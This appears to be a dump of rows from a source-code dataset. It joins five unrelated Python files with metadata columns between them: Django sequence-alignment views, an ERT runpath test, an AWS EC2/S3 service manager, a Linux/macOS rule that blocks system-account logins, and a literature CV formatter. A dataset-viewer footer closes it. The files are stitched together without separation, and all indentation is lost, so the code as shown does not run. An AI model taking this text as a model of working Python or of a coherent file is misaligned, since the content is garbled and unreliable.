# docs = 'sequences.html#similarity-search-gpcrdb'
# selection_boxes = OrderedDict([
# ('reference', True),
# ('segments', True),
# ('targets', True),
# ])
# buttons = {
# 'continue': {
# 'label': 'Show similarity',
# 'url': '/similaritysearch/render',
# 'color': 'success',
# },
# }
def render_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
if simple_selection == False or not simple_selection.targets or not simple_selection.reference:
return redirect("/similaritysearch/referenceselection")
# create an alignment object
a = Alignment()
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
return render(request, 'similaritysearch/alignment.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns})
def render_fasta_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
response = render(request, 'alignment/alignment_fasta.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.fasta"
return response
def render_csv_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_reference_protein_from_selection(simple_selection)
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
# calculate identity and similarity of each row compared to the reference
a.calculate_similarity()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
response = render(request, 'alignment/alignment_csv.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.csv"
return response
|
apache-2.0
| -7,357,047,311,267,593,000
| 32.964497
| 124
| 0.669861
| false
| 3.994433
| false
| false
| false
|
andreabrambilla/libres
|
python/tests/res/enkf/test_runpath_list_ert.py
|
1
|
3354
|
import unittest
import os
from res.test import ErtTestContext
from tests import ResTest
from res.enkf import RunpathList, RunpathNode, ErtRunContext
from res.enkf.enums import EnkfInitModeEnum,EnkfRunType
from ecl.util.util import BoolVector
from res.util.substitution_list import SubstitutionList
class RunpathListTestErt(ResTest):
def test_an_enkf_runpath(self):
# TODO this test is flaky and we need to figure out why. See #1370
# enkf_util_assert_buffer_type: wrong target type in file (expected:104 got:0)
test_path = self.createTestPath("local/snake_oil_field/snake_oil.ert")
with ErtTestContext("runpathlist_basic", test_path) as tc:
pass
def test_assert_export(self):
with ErtTestContext("create_runpath_export" , self.createTestPath("local/snake_oil_no_data/snake_oil.ert")) as tc:
ert = tc.getErt( )
runpath_list = ert.getRunpathList( )
self.assertFalse( os.path.isfile( runpath_list.getExportFile( ) ))
ens_size = ert.getEnsembleSize( )
runner = ert.getEnkfSimulationRunner( )
fs_manager = ert.getEnkfFsManager( )
init_fs = fs_manager.getFileSystem("init_fs")
mask = BoolVector( initial_size = 25 , default_value = True )
runpath_fmt = ert.getModelConfig().getRunpathFormat( )
subst_list = SubstitutionList( )
itr = 0
jobname_fmt = ert.getModelConfig().getJobnameFormat()
run_context1 = ErtRunContext( EnkfRunType.INIT_ONLY , init_fs, None , mask , runpath_fmt, jobname_fmt, subst_list , itr )
runner.createRunPath( run_context1 )
self.assertTrue( os.path.isfile( runpath_list.getExportFile( ) ))
self.assertEqual( "test_runpath_list.txt" , os.path.basename( runpath_list.getExportFile( ) ))
def test_assert_symlink_deleted(self):
with ErtTestContext("create_runpath_symlink_deleted" , self.createTestPath("local/snake_oil_field/snake_oil.ert")) as tc:
ert = tc.getErt( )
runpath_list = ert.getRunpathList( )
ens_size = ert.getEnsembleSize()
runner = ert.getEnkfSimulationRunner()
mask = BoolVector( initial_size = ens_size , default_value = True )
fs_manager = ert.getEnkfFsManager()
init_fs = fs_manager.getFileSystem("init_fs")
# create directory structure
runpath_fmt = ert.getModelConfig().getRunpathFormat( )
subst_list = SubstitutionList( )
itr = 0
jobname_fmt = ert.getModelConfig().getJobnameFormat()
run_context = ErtRunContext( EnkfRunType.INIT_ONLY , init_fs, None , mask , runpath_fmt, jobname_fmt, subst_list , itr )
runner.createRunPath( run_context )
# replace field file with symlink
linkpath = '%s/permx.grdcel' % str(runpath_list[0].runpath)
targetpath = '%s/permx.grdcel.target' % str(runpath_list[0].runpath)
open(targetpath, 'a').close()
os.remove(linkpath)
os.symlink(targetpath, linkpath)
# recreate directory structure
runner.createRunPath( run_context )
# ensure field symlink is replaced by file
self.assertFalse( os.path.islink(linkpath) )
|
gpl-3.0
| -5,098,693,126,175,305,000
| 40.407407
| 133
| 0.637448
| false
| 3.515723
| true
| false
| false
|
mattvonrocketstein/ymir
|
ymir/service/amazon.py
|
1
|
9978
|
# -*- coding: utf-8 -*-
""" ymir.service.amazon
"""
import os
import time
import boto
from fabric.colors import yellow
from ymir import util
from ymir.service.base import AbstractService
class AmazonService(AbstractService):
""" """
def __init__(self, conn=None, **kargs):
""""""
self.conn = conn or util.aws.get_conn()
super(AmazonService, self).__init__(**kargs)
def _get_instance(self, strict=False):
""" """
conn = self.conn
name = self.template_data()['name']
i = util.aws.get_instance_by_name(name, conn)
if strict and i is None:
err = "Could not acquire instance! Is the name '{0}' correct?"
err = err.format(name)
self.report(err)
raise SystemExit(1)
return i
def setup_ip(self):
""" """
self.sync_tags()
self.sync_buckets()
self.sync_eips()
super(AmazonService, self).setup_ip()
@util.declare_operation
def s3(self):
""" show summary of s3 information for this service """
buckets = self.sync_buckets(quiet=True).items()
if not buckets:
self.report("this service is not using S3 buckets")
for bname, bucket in buckets:
keys = [k for k in bucket]
self.report(" {0} ({1} items) [{2}]".format(
bname, len(keys), bucket.get_acl()))
for key in keys:
print (" {0} (size {1}) [{2}]".format(
key.name, key.size, key.get_acl()))
@property
def _s3_conn(self):
return boto.connect_s3()
@property
def _username(self):
""" username data is accessible only as a property because
it must overridden for i.e. vagrant-based services
"""
return self._service_json['username']
@property
def _pem(self):
""" pem-file is accessible only as a property because
it must overridden for i.e. vagrant-based services
"""
return util.unexpand(self._service_json['pem'])
@util.declare_operation
def sync_buckets(self, quiet=False):
report = self.report if not quiet else util.NOOP
buckets = self.template_data()['s3_buckets']
report("synchronizing s3 buckets")
if buckets:
report(' buckets to create: {0}'.format(buckets))
else:
self.report(" no s3 buckets mentioned in service-definition")
conn = self._s3_conn
tmp = {}
for name in buckets:
report(" setting up s3 bucket: {0}".format(name))
tmp[name] = conn.create_bucket(name, location=self.S3_LOCATION)
return tmp
@util.declare_operation
def sync_eips(self, quiet=False):
""" synchronizes elastic IPs with service.json data """
report = self.report if not quiet else lambda *args, **kargs: None
report("synchronizing elastic ip's")
service_instance_id = self._status()['instance'].id
eips = self.template_data()['elastic_ips']
if not eips:
report(' no elastic IPs mentioned in service-definition')
return
addresses = [x for x in self.conn.get_all_addresses()
if x.public_ip in eips]
for aws_address in addresses:
report(" Address: {0}".format(aws_address))
if aws_address.instance_id is None:
report(" -> currently unassigned. "
"associating with this instance")
aws_address.associate(instance_id=service_instance_id)
elif aws_address.instance_id == service_instance_id:
report(" -> already associated with this service")
else:
report(" -> assigned to another instance {0}! (that seems bad)".format(
aws_address.instance_id))
sync_elastic_ips = sync_eips
@util.declare_operation
@util.require_running_instance
def sync_tags(self):
""" update aws instance tags from service.json `tags` field """
self.report('updating instance tags: ')
json = self.template_data()
tags = dict(
description=json.get('service_description', ''),
org=json.get('org_name', ''),
app=json.get('app_name', ''),
env=json.get("env_name", ''),
)
for tag in json.get('tags', []):
tags[tag] = 'true'
for tag in tags:
if not tags[tag]:
tags.pop(tag)
self.report(' {0}'.format(tags.keys()))
self._instance.add_tags(tags)
@util.declare_operation
@util.require_running_instance
def terminate(self, force=False):
""" terminate this service (delete from ec2) """
instance = self._instance
self.report("{0} slated for termination.".format(instance))
if force:
return self.conn.terminate_instances(
instance_ids=[instance.id])
else:
msg = ("This will terminate the instance {0} ({1}) and can "
"involve data loss. Are you sure? [y/n] ")
answer = None
name = self.template_data()['name']
while answer not in ['y', 'n']:
answer = raw_input(msg.format(instance, name))
if answer == 'y':
self.terminate(force=True)
@util.declare_operation
@util.require_running_instance
def mosh(self):
""" connect to this service with mosh """
self.report('connecting with mosh')
service_data = self.template_data()
util.mosh(self.status()['ip'],
username=self._username,
pem=service_data['pem'])
ssh = util.require_running_instance(AbstractService.ssh)
def _status(self):
""" retrieves service status information.
use this instead of self.status() if you want to quietly
retrieve information for use without actually displaying it
"""
tdata = self._service_json # NOT template_data(), that's cyclic
if not self._status_computed and self._debug_mode:
self.report("AWS profile: {0}".format(yellow(
os.environ.get('AWS_PROFILE', 'default'))))
name = tdata['name']
# DON'T use self._get_instance(); recursion
instance = util.aws.get_instance_by_name(name, self.conn)
result = dict(
instance=None, ip=None,
private_ip=None, tags=[],
status='terminated?',)
if instance:
result.update(
dict(
instance=instance,
tags=instance.tags,
status=instance.update(),
ip=instance.ip_address,
private_ip=instance.private_ip_address,
))
self._status_computed = result
return result
@util.declare_operation
def create(self, force=False):
""" create new instance of this service ('force' defaults to False)"""
self.report('creating ec2 instance', section=True)
conn = self.conn
i = self._get_instance()
if i is not None:
msg = ' instance already exists: {0} ({1})'
msg = msg.format(i, i.update())
self.report(msg)
if force:
self.report(' force is True, terminating it & rebuilding')
util._block_while_terminating(i, conn)
# might need to block and wait here
return self.create(force=False)
self.report(' force is False, refusing to rebuild it')
return
service_data = self.template_data()
# HACK: deal with unfortunate vpc vs. ec2-classic differences
reservation_extras = service_data.get('reservation_extras', {}).copy()
# set security group stuff in reservation extras
sg_names = service_data['security_groups']
if not sg_names:
err = ('without `security_groups` in service.json, '
'cannot create instance reservation')
raise SystemExit(err)
self.report(
"service description uses {0} as a security groups".format(sg_names))
tmp = {}
sgs = dict([[sg.id, sg.name] for sg in conn.get_all_security_groups()])
for sg_name in sg_names:
if sg_name not in sgs.values():
err = "could not find {0} amongst security groups at {1}"
err = err.format(sg_names, sgs.values())
raise SystemExit(err)
else:
_id = [_id for _id in sgs if sgs[_id] == sg_name][0]
self.report(" sg '{0}' is id {1}".format(sgs[_id], _id))
tmp[_id] = sgs[_id]
reservation_extras['security_group_ids'] = tmp.keys()
reservation = conn.run_instances(
image_id=service_data['ami'],
key_name=service_data['key_name'],
instance_type=service_data['instance_type'],
**reservation_extras)
instance = reservation.instances[0]
self.report(' no instance found, creating it now.')
self.report(' reservation-id:', instance.id)
util._block_while_pending(instance)
status = instance.update()
name = self.template_data()['name']
if status == 'running':
self.report(' instance is running.')
self.report(' setting tag for "Name": {0}'.format(
name))
instance.add_tag("Name", name)
else:
self.report('Weird instance status: ', status)
return None
time.sleep(5)
self.report("Finished with creation. Now run `fab setup`")
@util.declare_operation
def shell(self):
""" """
return util.shell(
conn=self.conn,
Service=self, service=self)
|
mit
| 7,567,753,346,309,193,000
| 36.511278
| 89
| 0.552315
| false
| 4.16792
| false
| false
| false
|
CSD-Public/stonix
|
src/stonix_resources/rules/BlockSystemAccounts.py
|
1
|
12193
|
###############################################################################
# #
# Copyright 2019. Triad National Security, LLC. All rights reserved. #
# This program was produced under U.S. Government contract 89233218CNA000001 #
# for Los Alamos National Laboratory (LANL), which is operated by Triad #
# National Security, LLC for the U.S. Department of Energy/National Nuclear #
# Security Administration. #
# #
# All rights in the program are reserved by Triad National Security, LLC, and #
# the U.S. Department of Energy/National Nuclear Security Administration. The #
# Government is granted for itself and others acting on its behalf a #
# nonexclusive, paid-up, irrevocable worldwide license in this material to #
# reproduce, prepare derivative works, distribute copies to the public, #
# perform publicly and display publicly, and to permit others to do so. #
# #
###############################################################################
"""
Created on Apr 2, 2013
The BlockSystemAccounts rule will search through /etc/passwd to determine if
there are any system accounts which currently allow login. If any are found
which do allow login, the fix method will append :/dev/null to the end of
the entry in /etc/passwd preventing future login from them. One exception is
the 'root' account which will not be blocked due access to it being required
by administrators in certain situations.
@author: Breen Malmberg
@change: 01/29/2014 Derek Walker revised
@change: 02/12/2014 Ekkehard Implemented self.detailedresults flow
@change: 02/12/2014 Ekkehard Implemented isapplicable
@change: 02/19/2014 Ekkehard Make sure report always runs
@change: 04/18/2014 Dave Kennel Updated to new style configuration item.
@change: 2014/10/17 Ekkehard OS X Yosemite 10.10 Update
@change: 2015/04/14 Dave Kennel Updated for new style isApplicable
@change: 2015/06/10 Breen Malmberg - updated author names; implemented correct
mac os x functionality; refactored code for readability; fixed pep8 violations
@change: 2015/08/28 Ekkehard [artf37764] : BlockSystemAccounts(40) - NCAF - OS X El Capitan 10.11
@change: 2015/11/09 Ekkehard - make eligible of OS X El Capitan
@change: 2017/07/07 Ekkehard - make eligible for macOS High Sierra 10.13
@change: 2017/11/13 Ekkehard - make eligible for OS X El Capitan 10.11+
@change: 2018/06/08 Ekkehard - make eligible for macOS Mojave 10.14
@change: 2018/10/50 Breen Malmberg - refactor of rule
@change: 2019/03/12 Ekkehard - make eligible for macOS Sierra 10.12+
@change: 2019/08/07 ekkehard - enable for macOS Catalina 10.15 only
"""
import os
import re
import traceback
from rule import Rule
from logdispatcher import LogPriority
from CommandHelper import CommandHelper
from stonixutilityfunctions import readFile, iterate
from stonixutilityfunctions import resetsecon
class BlockSystemAccounts(Rule):
"""this module ensures that no system accounts have a login shell"""
def __init__(self, config, enviro, logger, statechglogger):
"""
private method to initialize this module
:param config: configuration object instance
:param enviro: environment object instance
:param logger: logdispatcher object instance
:param statechglogger: statechglogger object instance
"""
Rule.__init__(self, config, enviro, logger, statechglogger)
self.logger = logger
self.environ = enviro
self.rulenumber = 40
self.rulename = 'BlockSystemAccounts'
self.formatDetailedResults("initialize")
self.compliant = False
self.mandatory = True
self.sethelptext()
self.rootrequired = True
datatype = 'bool'
key = 'BLOCKSYSACCOUNTS'
instructions = """If you have system accounts that need to have valid \
shells set the value of this to False, or No."""
default = True
self.applicable = {'type': 'white',
'family': ['linux', 'solaris', 'freebsd'],
'os': {'Mac OS X': ['10.15', 'r', '10.15.10']}}
self.ci = self.initCi(datatype, key, instructions,
default)
self.guidance = ['CIS', 'NSA(2.3.1.4)', 'cce-3987-5', '4525-2',
'4657-3', '4661-5', '4807-4', '4701-9', '4669-8',
'4436-2', '4815-7', '4696-1', '4216-8', '4758-9',
'4621-9', '4515-3', '4282-0', '4802-5', '4806-6',
'4471-9', '4617-7', '4418-0', '4810-8', '3955-2',
'3834-9', '4408-1', '4536-9', '4809-0', '3841-4']
self.iditerator = 0
def report(self):
"""report on the status of the system's compliance with disallowing
system accounts to log in
:return: self.compliant - boolean; True if compliant, False if not
"""
self.detailedresults = ""
self.compliant = True
acceptable_nologin_shells = ["/sbin/nologin", "/dev/null", "", "/usr/bin/false"]
self.ch = CommandHelper(self.logger)
self.corrections_needed = []
try:
system_login_shells = self.getsysloginshells()
for acc in system_login_shells:
if system_login_shells[acc] not in acceptable_nologin_shells:
self.compliant = False
self.corrections_needed.append(acc)
if self.corrections_needed:
self.detailedresults += "\nThe following system accounts can log in:\n" + "\n".join(self.corrections_needed)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.compliant = False
self.detailedresults = traceback.format_exc()
self.logger.log(LogPriority.ERROR, self.detailedresults)
self.formatDetailedResults("report", self.compliant, self.detailedresults)
self.logdispatch.log(LogPriority.INFO, self.detailedresults)
return self.compliant
def getUIDMIN(self):
"""return this system's minimum user ID start value, if configured
:return: uid_min - string; system's user id starting value
"""
uid_min = ""
logindefs = "/etc/login.defs"
try:
# get normal user uid start value
logindefscontents = readFile(logindefs, self.logger)
if logindefscontents:
for line in logindefscontents:
if re.search("^UID_MIN", line, re.IGNORECASE):
sline = line.split()
uid_min = sline[1]
if not uid_min:
self.logger.log(LogPriority.DEBUG, "Unable to determine UID_MIN")
except IndexError:
pass
except IOError:
self.logger.log(LogPriority.DEBUG, "Failed to read uid_min from file")
return uid_min
return uid_min
def getsystemaccounts(self):
"""
return a list of system accounts
:return: system_accounts_list - list of system accounts
"""
system_accounts_list = []
if self.environ.getosfamily() == "darwin":
try:
system_accounts_list = ["root", "nobody"]
get_sys_accounts_cmd = "/usr/bin/dscl . list /Users | grep -i _"
self.ch.executeCommand(get_sys_accounts_cmd)
system_accounts_list += self.ch.getOutput()
except OSError:
self.logger.log(LogPriority.DEBUG, "Failed to retrieve list of system accounts")
return system_accounts_list
else:
exclude_accounts = ["halt", "shutdown", "sync", "root"]
system_accounts_list = []
uid_min = self.getUIDMIN()
if not uid_min:
uid_min = "500"
f = open("/etc/passwd", "r")
contentlines = f.readlines()
f.close()
try:
for line in contentlines:
sline = line.split(":")
if int(sline[2]) < int(uid_min):
if sline[0] not in exclude_accounts:
system_accounts_list.append(sline[0])
except IndexError:
pass
return system_accounts_list
def getloginshell(self, account):
"""
retrieve the login shell, of the passed account, from passwd
:param account: string; name of user account to get info for
:return: loginshell - string; default login shell path for account
"""
loginshell = ""
try:
f = open("/etc/passwd", "r")
contentlines = f.readlines()
f.close()
except IOError:
self.logger.log(LogPriority.DEBUG, "Could not read from passwd file")
return loginshell
try:
for line in contentlines:
if re.search("^"+account, line, re.IGNORECASE):
sline = line.split(":")
loginshell = sline[6]
except IndexError:
pass
return loginshell
def getsysloginshells(self):
"""
return a dictionary of system accounts and their login shells
:return: system_login_shells - dictionary of system accounts and their login shells
"""
system_login_shells = {}
system_accounts = self.getsystemaccounts()
for acc in system_accounts:
system_login_shells[acc] = self.getloginshell(acc).strip()
return system_login_shells
def setdefaultloginshell(self, account, shell):
"""
set default shell for given user account
:param account: string; name of user account to set default shell for
:param shell: the type of shell to set for the given user account
"""
change_shell_cmd = "/usr/bin/chsh -s " + shell + " " + account
self.ch.executeCommand(change_shell_cmd)
def fix(self):
"""The fix method will apply the required settings to the system.
self.rulesuccess will be updated if the rule does not succeed.
:return: self.rulesuccess - boolean; True if fix succeeds, False if not
"""
self.detailedresults = ""
self.rulesuccess = True
path = "/etc/passwd"
tmppath = path + ".stonixtmp"
self.iditerator = 0
newcontentlines = []
try:
if not self.ci.getcurrvalue():
return self.rulesuccess
f = open(path, "r")
contentlines = f.readlines()
f.close()
for line in contentlines:
sline = line.split(":")
if sline[0] in self.corrections_needed:
sline[6] = "/sbin/nologin\n"
line = ":".join(sline)
newcontentlines.append(line)
tf = open(tmppath, "w")
tf.writelines(newcontentlines)
self.iditerator += 1
myid = iterate(self.iditerator, self.rulenumber)
event = {'eventtype': 'conf',
'filepath': path}
self.statechglogger.recordchgevent(myid, event)
self.statechglogger.recordfilechange(path, tmppath, myid)
os.rename(tmppath, path)
os.chown(path, 0, 0)
os.chmod(path, 420)
resetsecon(path)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.rulesuccess = False
self.detailedresults = traceback.format_exc()
self.logger.log(LogPriority.ERROR, self.detailedresults)
self.formatDetailedResults("fix", self.rulesuccess, self.detailedresults)
self.logdispatch.log(LogPriority.INFO, self.detailedresults)
return self.rulesuccess
|
gpl-2.0
| 4,207,096,394,589,483,500
| 36.749226
| 124
| 0.580415
| false
| 4.137428
| true
| false
| false
|
nikpap/inspire-next
|
inspirehep/utils/cv_latex_html_text.py
|
1
|
10784
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2016 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this licence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
import re
from .export import MissingRequiredFieldError, Export
from inspirehep import config
class Cv_latex_html_text(Export):
"""Class used to output CV format(html) and CV format(text)."""
def __init__(self, record, format_type, separator):
super(Cv_latex_html_text, self).__init__(record)
self.record = record
self.format_type = format_type
self.separator = separator
def format(self):
"""Return CV format export for single record."""
formats = {
'record': self._format_record,
}
return formats['record']()
def _format_record(self):
required_fields = ['title', 'author', 'arxiv']
optional_fields = ['doi', 'publi_info']
try:
return self._format_entry(required_fields, optional_fields)
except MissingRequiredFieldError as e:
raise e
def _format_entry(self, req, opt):
"""
:raises: MissingRequiredFieldError
"""
out = ''
out += self._fetch_fields(req, opt) + '%s' % self.separator
return out
def _fetch_fields(self, req_fields, opt_fields=[]):
fields = {
'title': self._get_title,
'author': self._get_author,
'arxiv': self._get_arxiv,
'doi': self._get_doi,
'publi_info': self._get_publi_info,
}
out = ''
for field in req_fields:
value = fields[field]()
if value:
out += self._format_output_row(field, value)
# RAISE EXCEPTION HERE IF REQ FIELD IS MISSING
for field in opt_fields:
value = fields[field]()
if value:
out += self._format_output_row(field, value)
return out
def _format_output_row(self, field, value):
out = ''
if field == 'title':
if self.format_type == 'cv_latex_html':
out += unicode('<a href="' + config.SERVER_NAME + '/record/' +
str(self.record['control_number']) + '">' +
value + '.</a>' + self.separator)
else:
out += u'{0}{1}'.format(value, self.separator)
elif field == 'author':
if len(value) == 1:
out += u'By {0}.{1}'.format(value[0], self.separator)
elif len(value) > 8:
if 'collaboration' in self.record:
try:
collaboration = self.record[
'collaboration'][0]['value']
if 'Collaboration' in collaboration:
out += unicode('By ' + collaboration +
'(' + value[0] + ' et al.).' +
self.separator)
else:
out += unicode('By ' + collaboration +
' Collaboration (' +
value[0] + ' et al.).' +
self.separator)
except IndexError:
pass
else:
out += u'By {0} et al..{1}'.format(value[0],
self.separator)
else:
out += u'By {0}.{1}'.format(', '.join(value), self.separator)
elif field == 'arxiv':
if self.format_type == 'cv_latex_html':
out += u'[{0}].{1}'.format(value, self.separator)
else:
out += u'{0}.{1}'.format(value, self.separator)
elif field == 'doi':
dois_splitted = value.split(',')
for k, v in enumerate(dois_splitted):
v = '<a href="http://dx.doi.org/' + v + '">' + v + '</a>'
dois_splitted[k] = v
out += u'{0}.{1}'.format(', '.join(out for out in dois_splitted),
self.separator)
elif field == 'publi_info':
out += u'{0}.{1}'.format(', '.join(out for out in value),
self.separator)
return out
def _get_author(self):
"""Return list of name(s) of the author(s)."""
re_last_first = re.compile(
r'^(?P<last>[^,]+)\s*,\s*(?P<first_names>[^\,]*)(?P<extension>\,?.*)$'
)
result = []
if 'authors' in self.record:
for author in self.record['authors']:
if 'full_name' in author and author['full_name']:
if isinstance(author['full_name'], list):
author_full_name = ''.join(full_name for full_name
in author['full_name'])
first_last_match = re_last_first.search(
author_full_name)
if first_last_match:
result.append(
first_last_match.group('first_names') +
' ' + first_last_match.
group('last') +
first_last_match.
group('extension')
)
else:
first_last_match = re_last_first.search(
author['full_name'])
if first_last_match:
result.append(
first_last_match.group('first_names') +
' ' + first_last_match.
group('last') +
first_last_match.group('extension')
)
elif 'corporate_author' in self.record:
for corp_author in self.record['corporate_author']:
if corp_author:
result.append(corp_author)
return result
def _get_title(self):
"""Return record title(s)"""
record_title = ''
if 'titles' in self.record:
if isinstance(self.record['titles'], list):
for title in self.record['titles']:
if 'title' in title:
record_title = title['title']
break
else:
record_title = self.record['titles']['title'].strip()
if isinstance(self.record['titles'], list):
for subtitle in self.record['titles']:
if 'subtitle' in subtitle and subtitle['subtitle']:
record_title += ' : ' + subtitle['subtitle']
break
else:
if 'subtitle' in self.record['titles']:
record_title += ' : ' + self.record['titles']['subtitle']
if record_title.upper() == record_title or \
record_title.find('THE') >= 0:
record_title = ' '.join([word.capitalize() for word
in record_title.split(' ')])
return record_title
def _get_publi_info(self):
result = []
if 'publication_info' in self.record:
journal_title, journal_volume, year, journal_issue, pages = \
('', '', '', '', '')
for field in self.record['publication_info']:
out = ''
if 'journal_title' in field:
if isinstance(field['journal_title'], list):
if not ('journal_volume' in field or
'journal_issue' in field or
'page_artid' in field or
'doi' in self.record):
journal_title = 'Submitted to:' +\
field['journal_title'][-1]
else:
journal_title = field['journal_title'][-1]
else:
if not ('journal_volume' in field or
'journal_issue' in field or
'page_artid' in field or
'doi' in self.record):
journal_title = 'Submitted to:' +\
field['journal_title']
else:
journal_title = field['journal_title']
if 'journal_volume' in field:
journal_volume = ' ' + field['journal_volume']
if 'year' in field:
if isinstance(field['year'], list):
year = ' (' + str(field['year'][-1]) + ')'
else:
year = ' (' + str(field['year']) + ')'
if 'journal_issue' in field:
if field['journal_issue']:
journal_issue = ' ' + \
field['journal_issue'] + ','
if 'page_artid' in field:
if field['page_artid']:
if isinstance(field['page_artid'], list):
pages = ' ' + field['page_artid'][-1]
else:
pages = ' ' + field['page_artid']
out += journal_title + journal_volume + year + \
journal_issue + pages
result.append(out)
if not result:
for field in self.record['publication_info']:
if 'pubinfo_freetext' in field and len(field) == 1:
return field['pubinfo_freetext']
return result
|
gpl-2.0
| -8,740,075,710,879,147,000
| 42.659919
| 82
| 0.443064
| false
| 4.729825
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.